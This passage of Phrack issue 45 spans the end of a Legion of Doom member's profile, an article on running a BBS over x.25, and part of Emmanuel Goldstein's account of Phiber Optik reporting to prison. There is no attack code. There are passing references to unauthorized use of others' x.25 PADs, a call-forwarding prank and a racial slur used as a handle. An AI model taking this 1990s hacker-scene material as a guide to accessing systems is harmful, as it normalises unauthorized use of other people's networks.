  6136. Bill From RNOC - Fellow LOD Member. My Mentor.  He taught me
  6137. about UNIX and Phone Company Computer and Networks.  Taught me
  6138. how to engineer.  Was a great friend.  We talked 3-4 times a day
  6139. for a yea or so.  Haven't talked to him much lately.  Hope
  6140. everything is going well for you, Bill...
  6141.  
  6142. Lex Luthor - Mr. LOD!  U R Out of Control!  Lex is a great guy.
  6143. There have been rumors about him floating around for years.  Let
  6144. me tell you.  They are all false.  He is the greatest guy.  At
  6145. SummerCon he was pretty mellow.  He stayed at my house for a week
  6146. or two.  He was a blast.  I have pictures of Him, Bad Subscript
  6147. and me sitting on a dumpster outside EDS, and painted on the
  6148. dumpster it says "Computer Papers Only".  Also have picture of
  6149. him and I outside a funeral home with the address "2600" in BIG
  6150. letters.  Now he has been denying this outside in his underwear
  6151. story for years.  Here it is.  Lex stayed at my house for a few
  6152. weeks.  I hooked him up with this girl (she was HOT.. And he was
  6153. tearing it up with her every night).  Well we went to Motel Sex
  6154. (Motel 6) one night and were drinking pretty heavy.  At about
  6155. 0100 in the morning he went out of his room in his underwear.
  6156. Now the doors to the rooms are outside.  And was kicking my door
  6157. yelling "We need more Beer!".  I think it was blown a little out
  6158. of proportion.  I hear a story that he was running around the
  6159. parking lot or something.  But that is the story...anyway he's a
  6160. great guy.
  6161.  
  6162. Phantom Phreaker - Fellow LOD Member. FUN FUN FUN.  He is one of
  6163. the friendliest people I have ever meet.  He is a blast to party
  6164. with.  Love the hair!  He has good things to say about everyone.
  6165. I have never meet anyone that knows more about Switching System
  6166. and such than him.  He is a walking phone company manual.  BTW:
  6167. How's your balls? (Private Joke)
  6168.  
  6169. Doom Prophet - Fellow LOD Member. Phantom Phreaker's Twin Brother.
  6170. Haven't seen much of him the last few years.  Another walking
  6171. manual.  Hope you're doing good.
  6172.  
  6173. The Marauder - Fellow LOD Member.  I really got along great with
  6174. him.. Didn't see much of him the second night.  He and Phantom
  6175. Phreaker were hiding...but he was really a great guy!
  6176.  
  6177. Taran King/Knight Lightning - Got me into the "Elite" Scene.  I
  6178. really like you guys.  Always a lot of fun.  Don't see much of
  6179. you anymore at the SummerCons.  Train King is off with this
  6180. woman, now wife.  Congratulations.. Hope you are happy forever
  6181. And Knight Lightning is on the run from the Hotel manager who is
  6182. running around asking everyone  "Are you Craig Nedordorf?".
  6183.  
  6184. Erik Bloodaxe - Fellow LOD Member.  We have been completely "Out
  6185. of Control" together. He is a blast.  We have had our
  6186. differences, and I don't really know why.  But I really like him.
  6187. He is BIG fun!  I didn't see much of you at the last SummerCon.
  6188. Hope to talk to you more in the Future!
  6189.  
  6190. Forest Ranger - JT.  What a great and fun guy.  In the past we
  6191. didn't hang out too much, but last year at SummerCon we really
  6192. had a great time together. What a ladies' man!  Hope to see you
  6193. soon.  Give me a call...maybe you can come to Detroit with L666
  6194. and go to the Gran Prix.  I'm getting us all pit passes!
  6195.  
  6196. The Mentor - Fellow LOD Member.  Great guy.  We got into LOD/H
  6197. together.  Haven't heard much from him lately.  Hope all is
  6198. well.
  6199.  
  6200. The Prophet/The UrVile/The Leftist - Fellow LOD Members.  The
  6201. three of us really got along great.  We were always together at
  6202. the SummerCons.  We talked 5000000 times a day on the phone.  I
  6203. really liked them.  They were really cool.. Then............ What
  6204. the FUCK!  The government flew them to Detroit to testify in front
  6205. of the grand jury against me.  No problem--you do what you gotta
  6206. do.  But if you're in town you could at least give me a call
  6207. after all we have been through together.  That was really weak.
  6208. And don't return my calls 3 years later... Whatever!
  6209.  
  6210. Dispater - All around fun guy.  Didn't go to SummerCon last year.
  6211. I know Erreth Akbe was bummed.  He was really looking forward to
  6212. seeing you.  I'm not going this year, but if I *WAS*, I would
  6213. really like to see ya.
  6214.  
  6215. High Evolutionary - We have never met,  but in the mid 80's we
  6216. talked daily.  Haven't heard anything about him in years.  He was
  6217. really a smart guy. Hope all is well.
  6218.  
  6219. Psychic Warlord - Great guy.  Sysop of ShadowSpawn.  We hung
  6220. around A LOT in the old days. I understand you are getting
  6221. married.  Congratulations.  Hope I'm invited.
  6222.  
  6223. Mitch Kapor (Programmer of LOTUS) - You know why Mitch.  I thank
  6224. you much.  If you ever need anything.  You have my phone number!
  6225.  
  6226. Jim F - He helped me out of a LOT of problems.. Thanks Jim!
  6227.  
  6228. (Please Note: These are in no special order.  If you are on the
  6229. top of the list or the bottom it has no relation to your
  6230. importance on the list.)
  6231.  
  6232. ---------------------------------------------------------------------
  6233.  
  6234. What I think of the Future of the Underground:
  6235.  
  6236. Ahahaha.. LAME, LAME, LAME..   In the old days we were the first
  6237. to do things.  We would get on a system and play with it for
  6238. hours.  It was a quest for knowledge. That was what LOD/H was all
  6239. about. Today's new "hackers" are really assholes.  They don't do
  6240. it to learn.  They want to mess things up.  I really can't stand
  6241. the new anarchy thing that is going around.  We have kids logging
  6242. onto the BBS that say "I have 400+ viruses".  Well.. That's not
  6243. cool.
  6244.  
  6245. The purpose of hacking is to learn.  Learn the way a computer
  6246. system runs.  Learn how the telephone switching systems work.
  6247. Learn how a packet switching network works.  It's not to destroy
  6248. things or make other peoples lives a mess by deleting all the
  6249. work they did for the past week.  The reason the  Department of Justice
  6250. has crackdowns on computer hackers is because so many of them are
  6251. destructive.  That's just stupid criminal behavior and I hope they
  6252. all get busted.  They shouldn't be around.  You give real
  6253. hackers a bad name.
  6254.  
  6255. ----------------------------------------------------------------------
  6256.  
  6257. Other Things to Mention:
  6258.  
  6259. The "NEW Legion of Doom" -  Beyond Lame.  It is my understanding
  6260. that some lame kid from Canada (eh!) was starting a "New LOD".
  6261. Well those kids couldn't hack their way into, let alone out of a
  6262. Cracker Jack box.  If they are on you BBS.. Delete them!  They
  6263. have absolutely no affiliation with the real Legion of Doom!
  6264.  
  6265. DrunkFux - Jessie, I have been trying to get a hold of you for a
  6266. year now.  If you could get my number and call me.  Or call our
  6267. board (810)683-9722 and leave me your phone number.  I would like
  6268. to get Dena's phone number from you.
  6269.  
  6270. ----------------------------------------------------------------------
  6271.  
  6272. In the late 80's someone call forwarded my home phone to a Voice
  6273. Mail Box.. I heard it was SuperNigger, but he says not.. I
  6274. thought you guys might get a kick out of the message left on it.
  6275.  
  6276.  
  6277.      My name's Control C.. AKA Phase Jitter of LOD!
  6278.  
  6279.      Elite as can be...  I thought that was Me!
  6280.  
  6281.      Until they forwarded my number to a V.M.B.
  6282.  
  6283. ----------------------------------------------------------------------
  6284.  
  6285. Well that's about it.. My final words of wisdom... Call our
  6286. board.. It's 3l33t!
  6287.  
  6288.  
  6289. Control C
  6290. Legion of Doom/Hackers
  6291. 1994
  6292.                               ==Phrack Magazine==
  6293.  
  6294.                  Volume Five, Issue Forty-Five, File 8 of 28
  6295.  
  6296. ****************************************************************************
  6297.  
  6298.  
  6299.                         Running a Board on x.25
  6300.                         =======================
  6301.  
  6302. In this article, I want to inform the reader about advantages, problems,
  6303. experiences and fun about running a BBS on x.25.  I also want to do a few
  6304. comparisons between x.25 on one hand and the Internet and phone system
  6305. on the other.  This article may also help you to setup a BBS on a
  6306. UNIX, no matter if on x.25 or not.
  6307.  
  6308.  
  6309. I.      Systems on x.25...
  6310. ==========================
  6311.  
  6312. In my article for Phrack 42 about the German scene (read it if you haven't
  6313. done so yet! :-)  I also mentioned the x.25 scene and a few Bulletin Board
  6314. Systems (BBS / boards) on it.
  6315.  
  6316. One of the most popular ones, LUTZIFER, just went down on December 20, 1993.
  6317. Lutzifer used to be one of the most popular x.25 boards back in 1990 and
  6318. early 1991, when US people were still able to use Tymnet ("video" and
  6319. "parmaster") and Sprintnet without much of a hassle.  I spoke with Lutz
  6320. (sysop of Lutzifer) at the CCC Congress in Hamburg a week later.  He told
  6321. me that he first just wanted to change the speed for his x.25 connection
  6322. from 9600 to 2400 to save some money (actually 50%), because he didn't get
  6323. too many calls anyway.  But the German Telekom (who handle x.25 AND the phone
  6324. lines) wanted him to cancel his old x.25 connection, get a new NUA, pay the
  6325. $300 installation fee, all to get a 2400 bps connection.  This really made
  6326. Lutz mad, and he finally decided to cancel all x.25 - so goodbye to Lutzifer!
  6327.  
  6328. On the other side, QSD (the lamest chat system one can imagine) is still
  6329. up and running on x.25.  Back in Summer 1993, there have been many rumors
  6330. that QSD would go down.  It wasn't reachable from most networks in the world
  6331. anymore, including Sprintnet, Datex-P and others.  They were probably just
  6332. "testing" something - but QSD will never have its >80 online users again
  6333. (sounds pretty ridiculous compared to IRC :) that it had back in the good
  6334. old days.
  6335.  
  6336.  
  6337. II.     Advantages of x.25
  6338. ==========================
  6339.  
  6340. You may wonder what the advantages of running a board on x.25 are.
  6341. Wouldn't an Internet link or a phone dialup be enough?  In fact, the Internet
  6342. is getting more and more popular, the number of its hosts is increasing
  6343. dramatically.  This, and the fact that ISDN is faster and available to more
  6344. and more people at cheaper rates, makes x.25 seem unattractive.
  6345.  
  6346. But x.25 is a very old and safe network.  It hasn't really changed in 10
  6347. years.  There are hardly any netsplits like on the Internet, and it has
  6348. a very low rate of data errors.  X.25 is available in almost every country
  6349. (far over 200) in the world, even in countries that never heard of Internet
  6350. like Mauritius or United Arab Emirates.  This means that a lot of people from
  6351. all over the world can call you at a cheap rate (at least cheaper than
  6352. international phone charges, for some people even free at all :).
  6353. To the sysop it offers a couple of features that modems can't offer, and
  6354. where the Internet isn't safe enough.  This is also a reason why most banks,
  6355. insurances and credit agencies still rely on x.25.  I will describe those
  6356. features in the next chapter.
  6357.  
  6358.  
  6359. III.    Setting up your X.25 board
  6360. ==================================
  6361.  
  6362. So let's get practical after all this boring theory!
  6363.  
  6364. How do you start if you want to setup your own x.25 board?
  6365.  
  6366. First of all, you need your own x.25 line.  In most countries your phone
  6367. company would be responsible; in a few countries like the US you may even
  6368. have a choice of different x.25 providers like "Sprintnet".  The prices for
  6369. those lines really vary.  You may check the Sprintnet or Tymnet Toll Free
  6370. information service, that also gives you information and prices about
  6371. other countries.  E.g. in Germany a 2400 bps (the slowest) link would be
  6372. US$130 a month, a 9600 bps link about $260.  The good thing though is that
  6373. each additional virtual channel is just $3 more per month (in Germany).
  6374. A number of 16 channels is typical and 128 channels aren't exotic.
  6375.  
  6376. But remember, all channels have to share the maximum bandwidth of - let's
  6377. say - 9600 bps.  So if 10 people would start to leech the latest Phrack
  6378. at the same time, they would all just have 960 bps each or 96 cps.
  6379.  
  6380. But downloading isn't always that easy.  In fact, many of my users have
  6381. been reporting problems while trying to download.  While a few x.25
  6382. networks like Datapak Norway and German Datex-P are true 8 bit networks,
  6383. many networks and PADs just handle 7 bit connections.  It's not always
  6384. that easy to transfer binaries at 7 bit, though it was possible for me
  6385. to download from a Sprintnet dialup using a 'good' version of Z-Modem.
  6386.  
  6387. X.25 is not the right choice if you want to transfer huge amounts of data
  6388. anyway.  It is meant for people who work interactively.  It is recommended
  6389. for people who want to do a database research, read and write email and news
  6390. or just chat.
  6391.  
  6392. You will also notice that, if you are a paying x.25 user (aren't you all :-)
  6393. and get your bills, connection time is really cheap; up to 70 times cheaper
  6394. than long distance phone charges.  What counts are the transmitted bytes,
  6395. no matter how fast you are!  You easily pay $30 for transferring 1 MB.
  6396.  
  6397. But what else do you need after you got your x.25 link?
  6398.  
  6399. You need a PC (which doesn't have to be fast; I was using a 386sx for quite
  6400. some time.  In fact, my new 486/40 board is 'too fast' for my old x.25 8 bit
  6401. adaptor :).  It might also be interesting to run it on a Sun or HP
  6402. workstation; but the x.25 cards for those machines are rather expensive.
  6403.  
  6404. Then you need a good operating system.  Don't even think of running DOS.
  6405. You want to have a multi-user multi-tasking system after all, don't you?
  6406. So your choice is UNIX.  Systems with pretty good x.25 solutions are
  6407. Interactive and SCO Unix.  They are both old fashioned System V / 386's,
  6408. but are running safely, hardly ever crash and are popular in the commercial
  6409. world.  I chose Interactive.
  6410.  
  6411. How do you connect your PC to the x.25 line?
  6412.  
  6413. Good guess.  Yes, you need an adaptor card.  I got an EICON/PC card.  EICON
  6414. cards are probably the best supported and most common x.25 cards - they
  6415. are made in Canada.  However, they aren't cheap.  Usually they are around
  6416. $1000, if you are lucky you could get a used one for $600.  You might get
  6417. a cheaper x.25 adaptor, but check in advance if the software you want to
  6418. use supports that adaptor.  There is no real standard concerning x.25 cards!
  6419.  
  6420. Anything else you need?
  6421.  
  6422. Yes, the most important thing - the software.  UNIX doesn't come with
  6423. x.25 drivers.  However, there is a really good x.25 solution available
  6424. from netCS Software in Berlin, Germany.  (The company was co-founded
  6425. by "Pengo" Hans H.  Send them mail to postmaster@netcs.com for info.)
  6426.  
  6427.  
  6428. IV.     Features
  6429. ================
  6430.  
  6431. This software, and x.25 in general, has a few nice features.  If you
  6432. receive an x.25 call from somewhere, the NUA ("Network User Address")
  6433. of the caller is being transmitted to you.  This works pretty much like
  6434. Caller-ID, with the exception that the caller can't prevent it from being
  6435. transmitted, and he usually can't fake the address he is calling from.
  6436. Of course he can call through a couple of systems, and you would just
  6437. see the NUA of the last system he calls you from.
  6438.  
  6439. This feature can easily be used to accept or reject calls from certain
  6440. NUAs/systems or whole countries.  Many systems like banks just allow
  6441. certain NUAs to call them, just the ones that they know.
  6442.  
  6443. You could also give different access to different people:  people from
  6444. country A may login to your system, country B may just write you a mail,
  6445. all other countries are forced into chat and the NUA of CERT is being
  6446. rejected and received a "nice" goodbye message.
  6447.  
  6448. Of course you will also keep a logfile (and 99% of the systems you call
  6449. will have a logfile with YOUR call and the calls you might place using
  6450. its pad).  This logfile usually contains the NUA that calls you (or that
  6451. is being called), the programs that are being executed, the userid of
  6452. the caller, duration, reason for termination and more.
  6453.  
  6454. Another interesting feature is the 'Call User Data' (CUD).  The caller may
  6455. transmit up to 16 bytes (default is 4 bytes) to your host before he
  6456. establishes an x.25 connection.  In these bytes he may send you a Service
  6457. Request.  The default CUD is 01/00/00/00 and means 'interactive login'.
  6458. You may define any CUD you want and just accept calls that use that certain
  6459. CUD - it would work like a system password then.  Many systems may also
  6460. have a service request that allows the caller to execute commands on that
  6461. host remotely, without supplying any additional password (be aware of this!)
  6462.  
  6463. For more technical information about x.25 read one of the articles in the
  6464. previous issues of Phrack.  I am glad that Phrack is still covering x.25
  6465. with plenty of interesting articles after all these years!
  6466.  
  6467.  
  6468. IV.     Chosing the BBS Software
  6469. ================================
  6470.  
  6471. Okay.  Now we decided to choose UNIX as operating system.  Of course, you
  6472. could give all your users shell access, create a guest account with limited
  6473. shell access and a chat account that kicks you just into chat.  That's what
  6474. I used to do first.  But since we want to run an open system and give
  6475. accounts to many hackers, it might be a scary vision that all of them
  6476. have shell access and try to hack your system.
  6477.  
  6478. This is the point when you are looking for a BBS software for UNIX.  There
  6479. aren't too many free BBSes for UNIX around, most of them cost some hundred
  6480. dollars (check out the latest Boardwatch issue for more information).
  6481.  
  6482. However, I found a pretty decent BBS software called 'Uniboard'.  It runs
  6483. fine on most System V's including Interactive and SCO; versions for Sun OS
  6484. and Linux are available too.  It offers you a nice colorful (you may turn
  6485. it to black & white) menu driven interface.  You have to have C-News and
  6486. sendmail installed and running.  Instead of sendmail I use smail, which
  6487. is bug-free, much easier to install and offers at least the same features.
  6488. C-News though isn't that easy to install and takes quite some time and
  6489. document reading.  But these packages are used by Uniboard for messages (news)
  6490. and email.  This is pretty nice, because you can just exchange mail with
  6491. everyone on the Internet.  You can also read your favorite newsgroups
  6492. in Uniboard like alt.sex.bondage and post to local groups.  The filebase
  6493. is designed okay, but it doesn't feature the concept of ratios yet.
  6494. (You just get one byte download ability for each byte you upload!).  Rick,
  6495. the author, promised me to put it into the next version though.  The biggest
  6496. drawback is that you will just get the binary, no sources available,
  6497. so you can't put in all the features you would like.  For more information
  6498. send email to the author Rick in Italy at pizzi@nervous.com.
  6499. He will give you a free demo key that works for a few weeks, if you ask him.
  6500. Afterwards you could get a key for $40 and more, depending how many users
  6501. you want to have.
  6502.  
  6503.  
  6504. V.      How to get more users
  6505. =============================
  6506.  
  6507. You may think:  Okay, fine.  But not everybody has x.25 access, though
  6508. (almost) everybody has Internet access.  How could these people call me?
  6509. Well, the solution isn't easy.  I was told though that someone installed
  6510. an Internet site that would forward the call through an x.25 PAD to my
  6511. system.  Of course, the system administrator of that Internet site found
  6512. out after a while and installed the following banner (he obviously has
  6513. a sense of humor :) - someone sent me this log:
  6514.  
  6515.  
  6516. telnet> open pythia.csi.forth.gr 2600
  6517. Trying 139.91.1.1 ...
  6518. Connected to pythia.csi.forth.gr.
  6519. Escape character is '^]'.
  6520. Welcome to Sectec Direct. Please hold the line. :)
  6521. Calling...connected...
  6522.  
  6523. MUniBoard v. 1.12
  6524. 400 users Runtime System S/N 345968791
  6525. Licensed for single machine use to Seven Down on sectec
  6526. Unauthorized duplication allowed
  6527. Loading..
  6528.  
  6529.               ________________________________________________
  6530.              /~ .~  /  _ . ~/~ _ . |~  __ ~|  _ . \~ _    _ ~/
  6531.             // ____/_ |_\__/. | \__|. |__| | |_\__/\/ |  | \/
  6532.            /____   ~/  _|__|| |  __|:     _|  _|__    || |
  6533.             // .  //: |_/. \: |_/. || |\ \\: |_/. \   |: |
  6534.            /_____ /|________\______|__| \__\_______\  |__|
  6535.     ___________________________________________   ___________________
  6536.     \~ _    _ ~/ _ . ~/ _ .\~ _    _ ~/ __ |~ ~\ |~~|~| _ . ~/~ .~  /
  6537.      \/ |  | \/ |_\__/ | \__\/ |  | \/ /  \||   \| || || \__// ____/_
  6538.         || | ||  _|__| |  __   || | \\ \  /|: \  \ :| ||  ______   ~/
  6539.         |: | |: |_/. \ |_/. \  |: |  \  \/ || |\   .| ||_/. \/ .  //
  6540.         |__| |________\______\ |__|   \____|__| \___|_|______\___ /
  6541.  
  6542.  
  6543. Dear fellow hacker,
  6544. Please use YOUR telephone to make long distance calls
  6545. Using other's systems over the Internet is just NOT fair
  6546. let alone that is ILLEGAL.  Anyway, your hosts computer names/IP addresses
  6547. and location, as well as accurate logs of most of your recent/6 months
  6548. unauthorized calls are in file and might be used against you in court.
  6549. Legal service courtesy of FIRST/CERT
  6550.  
  6551. sorry if we ruined your day...
  6552.  
  6553. Connection closed by foreign host.
  6554.  
  6555.  
  6556. V.      Modem Ports
  6557. ===================
  6558.  
  6559. Also, every board on x.25 should have a direct modem dialup (and I guess
  6560. every board does!  The dialup for Lutzifer wasn't public, but it had one!)
  6561. You need to have a modem at least for uucp polling of news and mail.
  6562. If you are running UNIX, you don't need one of those really expensive
  6563. 'intelligent' cards like DigiBoard for $1000.  But make sure you have
  6564. a 16550 chip on your I/O controller or you won't be happy.  A pretty good
  6565. deal are AST compatible cards with 4 ports.  You can get them for $60 if
  6566. you are lucky.  They just use one IRQ for all 4 ports and let you select
  6567. the IRQ and the base addresses.  This is pretty convenient, because it
  6568. is even more likely to get an IRQ conflict under UNIX than under DOS.
  6569. Try to get a card with 16550's on it, or one that has sockets that let
  6570. you replace the old 16450's or whatever with 16550's, without playing
  6571. with your soldering iron.  If you buy 16550's, try to get the original
  6572. NS (National Semiconductor) ones: NS16550AFN; Texas Instrument's aren't
  6573. as good.
  6574.  
  6575. Then you should get a good serial port driver like the excellent FAS 2.10.
  6576. It is quite flexible with default drivers for AST compatible and standard
  6577. I/O cards, supports speeds up to 115,200 bps, and supports both incoming
  6578. and outgoing calls on the same line very well.  It only works with System V
  6579. though.
  6580.  
  6581. I can't help smiling when people tell me about their ElEeT WaR3Z boards
  6582. running on DOS and Novell with a separate PC for each node.  With the
  6583. configuration mentioned above, you can easily have 4 or 8 high speed modems
  6584. with a host speed of 57.600 connected to a single 386 PC and no performance
  6585. loss.
  6586.  
  6587.  
  6588. Email me for information or accounts, or just send me love letters :)
  6589. sec@g386bsd.first.gmd.de.
  6590.  
  6591. by Seven Up (damiano @ irc)
  6592.                               ==Phrack Magazine==
  6593.  
  6594.                  Volume Five, Issue Forty-Five, File 9 of 28
  6595.  
  6596. ****************************************************************************
  6597.  
  6598.  
  6599.  
  6600.  No Time For Goodbyes
  6601.  
  6602.  Phiber Optik's Journey to Prison
  6603.  
  6604.  by Emmanuel Goldstein
  6605.  
  6606.  It was almost like looking forward to something. That's the feeling
  6607.  we all had as we started out on Thursday evening, January 6th - one
  6608.  day before Phiber Optik (hereafter called Mark) was to report to
  6609.  federal prison in Schuylkill, Pennsylvania for his undefined part
  6610.  in an undefined conspiracy. We were all hackers of one sort or
  6611.  another and this trip to a prison was actually a sort of adventure
  6612.  for us. We knew Mark's curiosity had been piqued as well, though
  6613.  not to the point of outweighing the dread of the unknown and the
  6614.  emotional drain of losing a year of life with friends, family, and
  6615.  technology.
  6616.  
  6617.  There were five of us who would take the trip down to Philadelphia
  6618.  in a car meant for four - myself, Mark, Walter, Roman, and Rob. The
  6619.  plan was to meet up with 2600 people in Philadelphia on Thursday,
  6620.  drive out to Schuylkill and drop Mark off on Friday, drive back and
  6621.  go to the Philadelphia 2600 meeting, and return later that evening.
  6622.  It sure sounded better than sending him away on a prison bus.
  6623.  
  6624.  Knocking on the door of his family's house in Queens that frigid
  6625.  night, a very weird feeling came over me. How many times had I
  6626.  stood there before to take Mark to a conference, a hacker meeting,
  6627.  a radio show, whatever. Today I was there to separate him from
  6628.  everything he knew. I felt like I had somehow become part of the
  6629.  process, that I was an agent of the government sent there to finish
  6630.  the dirty work that they had begun. It doesn't take a whole lot to
  6631.  join the gestapo, I realized.
  6632.  
  6633.  I talked to Mark's father for the very first time that night. I had
  6634.  chatted with his mother on a number of occasions but never his
  6635.  father before then. He was putting on as brave a front as he could,
  6636.  looking at any glimmer of optimism as the shape reality would take.
  6637.  The prison wouldn't be that bad, he would be treated like a human
  6638.  being, they'd try to visit on the weekends, and anything else that
  6639.  could help make this seem like an extended vacation. As long as he
  6640.  learns to keep his mouth shut and not annoy anyone, he'll be all
  6641.  right. Of course, we both knew full well that Mark's forthright
  6642.  approach *always* managed to annoy somebody, albeit usually only
  6643.  until they got to know him a little. Imagining Mark fading into the
  6644.  background just wasn't something we could do.
  6645.  
  6646.  Everything in Mark's room was neatly arranged and ready to greet
  6647.  him upon his return - his computer, manuals, a videotape of "Monty
  6648.  Python and the Holy Grail" with extra footage that a friend had
  6649.  sent him (I convinced him to let me borrow it), a first edition of
  6650.  "Hackers" that Steven Levy had just given him, and tons of other
  6651.  items that could keep anyone occupied for hours. In fact, he was
  6652.  occupied when I got there - he and Walter were trying to solve a
  6653.  terminal emulation problem. My gestapo duties forced me to get him
  6654.  going. It was getting late and we had to be in Philadelphia at a
  6655.  reasonable time, especially since it was supposed to start snowing
  6656.  at any moment. And so, the final goodbyes were said - Mark's mother
  6657.  was especially worried that he might forget part of his medication
  6658.  or that they'd have difficulty getting him refills. (In fact,
  6659.  everyone involved in his case couldn't understand why Mark's
  6660.  serious health problems had never been mentioned during the whole
  6661.  ordeal or considered during sentencing.) The rest of us waited in
  6662.  the car so he could have some final moments of privacy - and also
  6663.  so we wouldn't have to pretend to smile while watching a family
  6664.  being pulled apart in front of us, all in the name of sending a
  6665.  message to other hackers.
  6666.  
  6667.  Our drive was like almost any other. We talked about the previous
  6668.  night's radio show, argued about software, discussed nuances of
  6669.  Star Trek, and managed to get lost before we even left New York.
  6670.  (Somehow we couldn't figure out how the BQE southbound connected
  6671.  with the Verrazano Bridge which led to an extended stay in
  6672.  Brooklyn.) We talked about ECHO, the system that Mark has been
  6673.  working on over the past year and how, since Wednesday, a couple of
  6674.  dozen users had changed their last names to Optik as a tribute. It
  6675.  meant a lot to him.
  6676.  
  6677.  When you're in a car with five hackers, there's rarely any quiet
  6678.  moments and the time goes by pretty quickly. So we arrived in
  6679.  Philadelphia and (after getting lost again) found our way to South
  6680.  Street and Jim's Cheesesteaks, a place I had always wanted to take
  6681.  Mark to, since he has such an affinity to red meat. Jim's is one of
  6682.  my favorite places in the world and we soon became very comfortable
  6683.  there. We met up with Bernie S. and some of the other Philadelphia
  6684.  hackers and had a great time playing with laptops and scanners
  6685.  while eating cheesesteaks. The people at Jim's were fascinated by
  6686.  us and asked all kinds of questions about computers and things.
  6687.  We've had so many gatherings like this in the past, but it was
  6688.  pretty cool to just pull into a strange city and have it happen
  6689.  again. The karma was good.
  6690.  
  6691.  We wound up back at Bernie S.'s house where we exchanged theories
  6692.  and experiences of our various cable and phone companies, played
  6693.  around with scanners, and just tried to act like everything was as
  6694.  normal as ever. We also went to an all-night supermarket to find
  6695.  Pennsylvania things: TastyKakes, Pennsylvania Dutch pretzels, and
  6696.  pickles that we found out were really from Brooklyn. We managed to
  6697.  confuse the hell out of the bar code reader by passing a copy of
  6698.  2600 over it - the system hung for at least a minute!
  6699.  
  6700.  It was around five in the morning when one of us finally asked the
  6701.  question: "Just when exactly does Mark have to be at this prison?"
  6702.  We decided to call them right then and there to find out. The
  6703.  person answering the phone was nice enough - she said he had until
  6704.  11:59 pm before he was considered a fugitive. This was very good
  6705.  news - it meant a few more hours of freedom and Mark was happy that
  6706.  he'd get to go to the Philadelphia meeting after all. As we drifted
  6707.  off to sleep with the sun rising, we tried to outdo each other with
  6708.  trivial information about foreign countries. Mark was particularly
  6709.  good with obscure African nations of years past while I was the
  6710.  only one who knew what had become of Burma. All told, not a bad
  6711.  last day.
  6712.  
  6713.  Prison Day arrived and we all got up at the same moment (2:03 pm)
  6714.  because Bernie S. sounded an airhorn in the living room. Crude, but
  6715.  effective.
  6716.  
  6717.  As we recharged ourselves, it quickly became apparent that this was
  6718.  a very bizarre day. During the overnight, the entire region had
  6719.  been paralyzed by a freak ice storm - something I hadn't seen in 16
  6720.  years and most of the rest of us had never experienced. We turned
  6721.  on the TV - interstates were closed, power was failing, cars were
  6722.  moving sideways, people were falling down.... This was definitely
  6723.  cool. But what about Mark? How could we get him to prison with
  6724.  roads closed and treacherous conditions everywhere? His prison was
  6725.  about two hours away in the direction of wilderness and mining
  6726.  towns. If the city was paralyzed, the sticks must be amputated
  6727.  entirely!
  6728.  
  6729.  So we called the prison again. Bernie S. did the talking, as he had
  6730.  done the night before. This time, he wound up getting transferred
  6731.  a couple of times. They weren't able to find Mark's name anywhere.
  6732.  But that good fortune didn't last - "Oh yeah, I know who you're
  6733.  talking about," the person on the phone said. Bernie explained the
  6734.  situation to them and said that the State Troopers were telling
  6735.  people not to travel. So what were we to do? "Well," the
  6736.  friendly-sounding voice on the other end said, "just get here when
  6737.  you can get here." We were overjoyed. Yet more freedom for Mark all
  6738.  because of a freak of nature! I told Bernie that he had already
  6739.  been more successful than Mark's lawyer in keeping him out of
  6740.  prison.
  6741.  
  6742.  We spent the afternoon getting ready for the meeting, watching The
  6743.  Weather Channel, and consuming tea and TastyKakes in front of a
  6744.  roaring fire. At one point we turned to a channel that was hawking
  6745.  computer education videos for kids. "These children," the fake
  6746.  schoolteacher was saying with equally fake enthusiasm, "are going
  6747.  to be at such an advantage because they're taking an early interest
  6748.  in computers." "Yeah," we heard Mark say with feigned glee from
  6749.  another room, "they may get to experience *prison* for a year!"
  6750.  
  6751.  It took about 45 minutes to get all of the ice off our cars.
  6752.  Negotiating hills and corners became a matter of great concern. But
  6753.  we made it to the meeting, which took place in the middle of 30th
  6754.  Street Station, where all of the Amtrak trains were two and a half
  6755.  hours late. Because of the weather, attendance was less than usual
  6756.  but the people that showed up were enthusiastic and glad to meet
  6757.  Phiber Optik as he passed by on his way up the river.
  6758.  
  6759.  After the meeting we found a huge tunnel system to explore,
  6760.  complete with steampipes and "Poseidon Adventure" rooms. Everywhere
  6761.  we went, there were corridors leading to new mysteries and strange
  6762.  sights. It was amazing to think that the moment when everybody
  6763.  figured Mark would be in prison, here he was with us wandering
  6764.  around in the bowels of a strange city. The karma was great.
  6765.  
  6766.  But then the real fun began. We decided to head back to South
  6767.  Street to find slow food - in fact, what would probably be Mark's
  6768.  last genuine meal. But Philadelphia was not like New York. When the
  6769.  city is paralyzed, it really is paralyzed. Stores close and people
  6770.  stay home, even on a Friday night. We wanted to take him to a Thai
  6771.  place but both of the ones we knew of were closed. We embarked on
  6772.  a lengthy search by foot for an open food place. The sidewalks and
  6773.  the streets were completely encased in ice. Like drunken sailors in
  6774.  slow motion, we all staggered down the narrow streets, no longer so
  6775.  much concerned with food, but just content to remain upright.
  6776.  People, even dogs, were slipping and falling all around us. We did
  6777.  our best to maintain dignity but hysterical laughter soon took over
  6778.  because the situation was too absurd to believe. Here we were in a
  6779.  strange city, unable to stand upright in a veritable ice palace,
  6780.  trying to figure out a way to get one of our own into a prison. I
  6781.  knew it was going to be a strange trip but this could easily beat
  6782.  any drug.
  6783.  
  6784.  We ate like kings in a Greek place somewhere for a couple of hours,
  6785.  then walked and crawled back to the cars. The plan now was to take
  6786.  Mark to prison on Saturday when hopefully the roads would be
  6787.  passable. Actually, we were all hoping this would go on for a while
  6788.  longer but we knew it had to end at some point. So, after a stop at
  6789.  an all-night supermarket that had no power and was forced to ring
  6790.  up everything by hand, we made it back to Bernie's for what would
  6791.  really be Mark's last free night. It was well after midnight and
  6792.  Mark was now officially late for prison. (Mark has a reputation for
  6793.  being late to things but at least this time the elements could take
  6794.  the blame.) We wound up watching the "Holy Grail" videotape until
  6795.  it was practically light again. One of the last things I remember
  6796.  was hearing Mark say how he wanted to sleep as little as possible
  6797.  so he could be awake and free longer.
  6798.  
  6799.  We left Bernie's late Saturday afternoon. It was sad because the
  6800.  aura had been so positive and now it was definitely ending. We were
  6801.  leaving the warmth of a house with a fireplace and a conversation
  6802.  pit, journeying into the wild and the darkness with wind chill
  6803.  factors well below zero. And this time, we weren't coming back.
  6804.  
  6805.  We took two cars - Bernie and Rob in one; me, Mark, Walter, and
  6806.  Roman in the other. We kept in touch with two way radios which was
  6807.  a very good idea considering the number of wrong turns we always
  6808.  manage to make. We passed through darkened towns and alien
  6809.  landscapes, keeping track of the number of places left to go
  6810.  through. We found a convenience store that had six foot tall beef
  6811.  jerky and Camel Light Wides. Since Mark smokes Camel Lights (he had
